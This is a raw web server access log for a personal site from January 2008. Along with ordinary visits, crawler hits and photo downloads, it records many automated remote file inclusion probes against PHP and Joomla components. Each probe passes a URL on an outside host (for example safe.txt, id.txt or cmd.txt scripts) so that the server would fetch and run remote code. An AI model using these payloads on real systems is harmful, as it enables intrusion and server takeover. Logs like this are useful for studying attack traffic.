68.8.232.250 - warboard [31/Jan/2008:15:46:53 -0800] "POST /warboard/index.php?table_name=warboard_main&page=0&function=update&where_field=dataid&where_value=586 HTTP/1.1" 302 2906 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=586" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [31/Jan/2008:15:46:54 -0800] "GET /warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=586&just_updated=1 HTTP/1.1" 200 7664 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=586" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [31/Jan/2008:15:46:57 -0800] "GET /warboard/index.php?table_name=warboard_main HTTP/1.1" 200 32998 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=edit&where_field=dataid&where_value=586&just_updated=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [31/Jan/2008:15:47:03 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC HTTP/1.1" 200 32960 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
68.8.232.250 - warboard [31/Jan/2008:15:47:05 -0800] "GET /warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC HTTP/1.1" 200 33224 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=ASC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11" "www.dmulk.com"
88.218.97.19 - - [31/Jan/2008:15:47:58 -0800] "GET /logs/access_080106.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.218.97.19 - - [31/Jan/2008:15:47:58 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.usw-squad.net/modules/Neos_Chronos/upload/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.126 - - [31/Jan/2008:15:49:22 -0800] "GET /retreat1/ HTTP/1.0" 200 15065 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20071214 BonEcho/2.0.0.4" "www.dmulk.com"
64.59.71.229 - - [31/Jan/2008:15:51:23 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.59.71.229 - - [31/Jan/2008:15:51:23 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
64.34.193.229 - - [31/Jan/2008:15:52:03 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.193.229 - - [31/Jan/2008:15:52:04 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.193.229 - - [31/Jan/2008:15:52:04 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.155.109.117 - - [31/Jan/2008:15:52:29 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.34.193.229 - - [31/Jan/2008:15:52:38 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.34.193.229 - - [31/Jan/2008:15:53:23 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.128.148.83 - - [31/Jan/2008:15:53:36 -0800] "GET /logs/access_071228.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.81.2 - - [31/Jan/2008:15:53:38 -0800] "GET /index.php?redir=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
220.128.148.83 - - [31/Jan/2008:15:53:39 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.128.148.83 - - [31/Jan/2008:15:53:43 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
140.113.4.81 - - [31/Jan/2008:15:54:49 -0800] "GET /logs/access_071218.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
140.113.4.81 - - [31/Jan/2008:15:54:49 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.17.81.2 - - [31/Jan/2008:15:55:25 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
140.113.4.81 - - [31/Jan/2008:15:55:41 -0800] "GET /logs/access_080101.log/classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.128.148.83 - - [31/Jan/2008:15:57:02 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.19.148 - - [31/Jan/2008:15:57:04 -0800] "GET /plans/?M=A HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.208.78.80 - - [31/Jan/2008:15:57:10 -0800] "GET //spaw/config/spaw_control.config.php?spaw_root=http://www.send2thailand.com/cache/cache_c21f969b5f03d33d43e04f8f136e7682_3f46aa4070409dc6745ea50a9859f388/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.250 - - [31/Jan/2008:15:58:08 -0800] "GET /logs/access_080106.log/!scanhttp://eilan.org/matyie/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.250 - - [31/Jan/2008:15:58:08 -0800] "GET /!scanhttp://eilan.org/matyie/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.250 - - [31/Jan/2008:15:58:09 -0800] "GET /logs/!scanhttp://eilan.org/matyie/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.28.112.250 - - [31/Jan/2008:15:58:17 -0800] "GET /logs/access_071214.log/!scanhttp://eilan.org/matyie/spr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
220.128.148.83 - - [31/Jan/2008:16:00:58 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.h4x0rtools.kit.net/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.20.34 - - [31/Jan/2008:16:02:12 -0800] "GET /bikes/GPS/?N=D HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.17.114.133 - - [31/Jan/2008:16:03:32 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.195.44.108 - - [31/Jan/2008:16:07:32 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.91 - - [31/Jan/2008:16:07:33 -0800] "GET /logs/access_071230.log HTTP/1.0" 200 231687 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.155.109.117 - - [31/Jan/2008:16:07:38 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.72.9.24 - - [31/Jan/2008:16:14:57 -0800] "GET /logs/access_071122.log HTTP/1.1" 200 35217 "http://www.google.co.uk/search?hl=en&q=194.72.9.25&btnG=Google+Search&meta=" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12.2 (KHTML, like Gecko) Version/3.0.4 Safari/523.12.2" "www.dmulk.com"
213.194.149.190 - - [31/Jan/2008:16:15:29 -0800] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.160 - - [31/Jan/2008:16:16:56 -0800] "GET /logs/access_071115.log HTTP/1.0" 200 56806 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.89 - - [31/Jan/2008:16:25:04 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.32.122.53 - - [31/Jan/2008:16:26:34 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.67.27.39 - - [31/Jan/2008:16:29:48 -0800] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
80.67.27.39 - - [31/Jan/2008:16:29:48 -0800] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://familia.oscarreno.com.mx//modules/Forums/admin/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
62.146.114.227 - - [31/Jan/2008:16:35:25 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
62.146.114.227 - - [31/Jan/2008:16:35:25 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.q8x.info/blog/wp-content/themes/pink-kupy-10/117.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
67.195.44.94 - - [31/Jan/2008:16:35:33 -0800] "GET /logs/access.log HTTP/1.0" 200 509307 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:35:59 -0800] "GET /logs/errors.php?error=http://kaizo.100webspace.net/id/floder.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:35:59 -0800] "GET /logs/errors.php?error=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:36:00 -0800] "GET /errors.php?error=http://kaizo.100webspace.net/id/floder.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:36:00 -0800] "GET /errors.php?error=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:36:27 -0800] "GET /errors.php?error=http://kaizo.100webspace.net/id/floder.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:36:27 -0800] "GET /logs/errors.php?error=http://kaizo.100webspace.net/id/floder.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:36:27 -0800] "GET /errors.php?error=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:36:27 -0800] "GET /logs/errors.php?error=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:16:39:09 -0800] "GET /logs/access_071228.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:16:39:14 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:16:39:20 -0800] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:39:57 -0800] "GET /errors.php?error=http://kaizo.100webspace.net/id/floder.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:39:58 -0800] "GET /errors.php?error=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:39:58 -0800] "GET /logs/errors.php?error=http://kaizo.100webspace.net/id/floder.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
212.40.65.18 - - [31/Jan/2008:16:39:58 -0800] "GET /logs/errors.php?error=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)" "www.dmulk.com"
85.25.151.27 - - [31/Jan/2008:16:42:42 -0800] "GET /logs/access_071231.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.sec6.biz/zen/media/tss.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.194.149.190 - - [31/Jan/2008:16:42:54 -0800] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.194.149.190 - - [31/Jan/2008:16:42:54 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://yudz-yudz.110mb.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.107 - - [31/Jan/2008:16:45:01 -0800] "GET /logs/access_070730.log HTTP/1.0" 200 41451 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.26.105 - - [31/Jan/2008:16:45:29 -0800] "GET /tmp/?N=D HTTP/1.0" 200 815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.21.85.101 - - [31/Jan/2008:16:48:09 -0800] "GET /logs/access_080117.log//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [31/Jan/2008:16:48:10 -0800] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.21.85.101 - - [31/Jan/2008:16:48:11 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.157.182.9 - - [31/Jan/2008:16:50:48 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.freewebtown.com/scanr0x/1/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.122.53 - - [31/Jan/2008:16:52:57 -0800] "GET /logs/access_080117.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.32.122.53 - - [31/Jan/2008:16:52:57 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://h1.ripway.com/renatas2/id21.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [31/Jan/2008:16:58:25 -0800] "GET /logs/access_071120.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [31/Jan/2008:16:58:25 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.234.1.78 - - [31/Jan/2008:16:58:26 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.233.130.55 - - [31/Jan/2008:16:58:57 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.233.130.55 - - [31/Jan/2008:16:59:42 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://tanbebek.com/pitik/ascid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
222.234.1.78 - - [31/Jan/2008:16:59:48 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:46 -0800] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:46 -0800] "GET /bikes/dteel/2008_01_26/IMG_4341M.JPG HTTP/1.1" 200 106800 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:47 -0800] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:47 -0800] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:48 -0800] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:48 -0800] "GET /bikes/dteel/2008_01_26/IMG_4352M.JPG HTTP/1.1" 200 104891 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:48 -0800] "GET /bikes/dteel/2008_01_26/IMG_4354M.JPG HTTP/1.1" 200 109550 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:49 -0800] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:49 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:50 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:51 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:51 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:52 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:53 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:54 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4371M.JPG HTTP/1.1" 200 98619 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:54 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
68.43.230.137 - - [31/Jan/2008:17:00:55 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?p=376316#post376316" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" "www.dmulk.com"
